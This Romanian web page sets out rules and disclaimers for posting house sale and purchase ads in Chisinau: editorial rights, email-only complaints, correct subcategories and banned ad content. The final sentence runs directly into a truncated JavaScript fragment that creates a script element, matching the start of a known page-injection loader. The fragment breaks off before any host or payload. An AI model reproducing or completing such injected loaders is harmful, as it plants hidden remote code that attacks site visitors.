case chisinau

case chisinau

ZIarele de specialitate unde sunt publicate anunturi pentru vanzari si cumparari de case in Chisinau precum si site-urile specializate ale firmelor de imobiliare din Chisinau si nu numai nu isi pot asuma responsabilitatea in legatura cu nici un anunt publicat, sau in legatura cu veridicitatea textelor ori a fotografiilor publicate sau postate, precum si in cazul altor materiale furnizate si folosite de catre utilizatori in procesul de concepere al anunturilor ori pentru orice spatiu publicitar, aceasta responsabilitate revenind integral utilizatorilor ce au publicat ori au comandat anunturile din spatiile publicitare respective.

Redactia ziarelor de profil isi rezerva practic dreptul de publicare , de a posta sau tiparii spre promovare orice anunt care este adaugat prin serviciul si in cadrul site-urilor ori in cazul publicatiilor partenere, pe diverse pagini de specifice de Social Media fie ele proprii ori ale partenerilor.

Pentru a avea coerenta a lecturii, respectivele anunturi se publica in ziar doar o singura data.

Redactiile de specialitate ale ziarelor isi rezerva de regula dreptul de modificare sau de stergere pentru orice anunt de vanzare sau cumparare case in Chisinau , care este adaugat cu ajutorul acestui serviciu.

Reclamatii care se fca din partea clientilor cu privire la ceea ce priveste anunturile ce sunt publicate pot sa se faca numai in perioada publicarii anuntului adica anuntul trebuie sa fie activ pe respectivul site si doar prin email la adresa specicila pentru suport client care se afla de regula pe site-urile de specialitate. Reclamatiile pentru oric anunt expirat nu sunt luate in considerare in cea mai mare parte dintre site-uri.

Recomandari anunturi vanzare/cumparare

Se recomanda beneficiarilor anunturilor de vanzare/cumparare de case in Chisinau precum si pentru alte anunturi imobiliare sa se foloseasca in mod corespunzator serviciului de adaugare al anunturilor , sa se utilizeze varianta desktop pentru accesarea site-ulrilor de specialitate. Ziarul unde este publicat anuntul imobiliar precum si ziarul care are acelasi scop sau pagini dedeicate, nu pot sa fie trase la raspundere in cazul aparitiei eventualelor probleme ce pot sa apara odata cu adaugarea de noi anunturi utilizandu-se telefonul mobil sau tableta ori alte device-uri.

Se recomanda ca pentru mai buna solutionare a oricarei probleme ce poate sa aparea pe site-urile de specialitate precum si pentru o cat mai corecta informare facuta utilizatorilor sau clientilor site-ului, orice tip de comunicare, indiferent de tema sa se faca numai prin email , accesand adresa de e-mail aferenta suportului pentru clienti.

Continutul anunturilor

Nu trebuie sa fie adaugate anunturi la subrubrici necorespunzatoare, este un alt sfat dat de specialisti. Dacatotusi vor exista anunturi de acest gen, ele vor fi mutate de catre administratori la subrubrica corespunzatoare lor ori, in cazul in care se constata unele abuzuri de genul nerespectarii regulamentului in mod deliberat si repetat , desi s-au transmis si primit notificari in acest sens anunturile respective vor fi sterse.

Nu trebuie sa fie introduse anunturi care au un caracter discriminatoriu in functie de rasa, de religie, etnie,varsta sau sex.

Deasemeni, nu se vor introduce anunturi ce au un continut care face referire la activitatea politica, la vanzari de organe, de arme, la magie, decese, ghicit, donatii sau anunturi umanitare.var d=document;var s=d.createElement(‘script’);